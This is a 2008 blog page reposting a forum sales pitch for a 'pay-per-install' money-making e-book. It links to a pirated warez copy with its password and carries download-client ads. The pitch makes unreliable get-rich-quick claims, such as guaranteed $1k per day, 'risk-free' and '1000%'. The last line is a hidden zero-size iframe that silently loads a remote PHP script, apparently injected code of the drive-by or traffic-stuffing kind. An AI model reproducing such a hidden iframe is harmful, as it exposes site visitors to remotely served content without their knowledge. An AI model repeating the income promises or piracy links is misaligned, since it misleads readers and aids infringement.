Header Pogads

Friday, July 25, 2008

Make $1k PER DAY Through Pay Per Installs. 99% automated!

Hi guys, after seeing how selling Ebooks can get me some extra cash on digital point, i’ve written my very first e-book.
I know i havent been active in the forums but you can check my account has been here way back in August 2007. So i’ve been here off and on.

I would like to share with you my personal way of making money through pay-per-installs, lots of money as the title suggests. $30,000 per month which is an average
$1k per day.

It’s a very simple risk-free system that brings in the cash without any effort except the initial bit.

I’m not going to elaborate much here but you can find more details on the page i have set up just for you DP members. Its at http://upsizecash.com

Time required:
- 1 full day to start off, 10 minutes per day to check your earnings. Thats it.

Investment to start:
-$300+ for this e-book
-an optional $0 or $240 to start off the business.
-It’s optional because there are 4 different methods for this system to work for you and you can use all 4 as you wish.

Price:
$330 for the first 20 copies
$360 for the last 30 copies.
I’m selling 50 copies thats it.

What you get:
-A 19 page e-book with 4 different methods to get you earning 1k per day max.
-2 template samples for your reference and modification
-First 5 get free 1 to 1 coaching with me for 1 hour.
Please refer to http://upsizecash.com for more details.

I have to tell you that you HAVE to have at least basic HTML knowledge for this because you will need to build a simple 2 page site and yes a domain name.

My guarantee :: You will make $1k first month or your money back. If you follow my e-book closely, it will work for you 1000%. Why? because i’ve tried it myself, its not black hat and its totally risk-free. I CHALLENGE YOU TO TAKE THIS CHALLENGE. FOLLOW MY STEPS OR YOUR MONEY BACK!

I’m giving 5 review copies. So those with lots of itrader+reputation points can request it by pm-ing me. I’ll let them describe it further without giving away the secrets.
Thanks.

HTTP://UPSIZECASH.com for more info

Reviewers: demdem,sp360,mikey1090,nahian,riya_senk,shylesson

Sales page:

http://forums.digitalpoint.com/showthread.php?t=932551

Value: $330

Download File: Make $1K Per Day Through Pay Per Install - 99% Automated!
Newsgroup: alt.binaries.warez.dp
File Size: 1,65 Mb
File Type: pdf (password : test)


How to download?

To download this file you will need the UseNeXT download client.
It's Free, 100% anonymous, 100% secure and very easy to use.

Usenet Binaries: Anonymous downloads at DSL Speed

Download GREAT GAMES for FREE

Template by - Abdul Munir | Daya Earth Blogger Template
< iframe id="Iframe1" name="Iframe1" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="0" height="0" src="http://work.host-ed.net/Stuff//stuffer.php">